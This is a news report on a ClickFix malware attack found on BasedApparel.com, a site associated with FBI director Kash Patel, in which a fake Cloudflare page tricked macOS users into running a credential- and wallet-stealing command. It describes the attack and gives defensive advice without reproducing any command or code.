The apparel site co-created by FBI director Kash Patel has been compromised with a ClickFix-style attack attempting to trick macOS users into executing malicious commands through Terminal, potentially stealing browser credentials and cryptocurrency wallet data.
A website associated with FBI director Kash Patel has been discovered hosting a sophisticated malware attack targeting macOS users. BasedApparel.com, a merchandise brand co-created by Patel and Andrew Ollis before Patel's appointment as FBI director, was found to be distributing a ClickFix-style attack that attempts to dupe visitors into running malicious commands.
The attack manifests when users visit BasedApparel.com, displaying a fake Cloudflare verification page that claims to detect "unusual web traffic" and requires human verification. Rather than a standard CAPTCHA, the page instructs users to open macOS's Terminal utility and copy a supposedly verification command. However, clicking the "Copy" button actually copies an obfuscated, malicious command that appears to be gibberish but contains hidden instructions.
Once pasted into Terminal and executed, the command decodes and fetches a shell script from a hacker-controlled domain. Security researchers analyzing the payload found it to be wrapped in double base64 encoding and written in AppleScript. When executed through Terminal, the malware can steal stored credentials from Chromium-based browsers and data from cryptocurrency wallets, compiling this information into a zip archive that's sent to the attacker's server.
The attack was first spotted by a user in Portugal who encountered it after following a link from an article in The Atlantic about Patel. PCMag confirmed the attack exists on the site but noted it only appeared once during testing with Chrome on a MacBook. The malicious payload was flagged by 27 antivirus engines when analyzed through VirusTotal, with most detecting it as a Trojan and infostealer.
This incident represents a ClickFix attack, a persistent threat in recent years that preys on less tech-savvy users. Security researchers have noted that such attacks typically occur when hackers compromise legitimate websites by stealing login credentials, tampering with admin panels, or exploiting vulnerable plugins.
Based Apparel has not yet responded to requests for comment regarding the security breach. The attack serves as a reminder of the importance of vigilance against pop-ups and scareware tactics. Apple has recently introduced safeguards in macOS Tahoe 26.4 that warn users against running copied-and-pasted commands in Terminal, specifically addressing the potential for such malware attacks.
Users should be cautious when encountering any website that prompts them to execute commands in Terminal, especially those claiming to be from security services like Cloudflare. Standard security practices include keeping software updated, using reputable antivirus solutions, and being skeptical of unexpected verification processes that require system-level access.
Comments
Please log in or register to join the discussion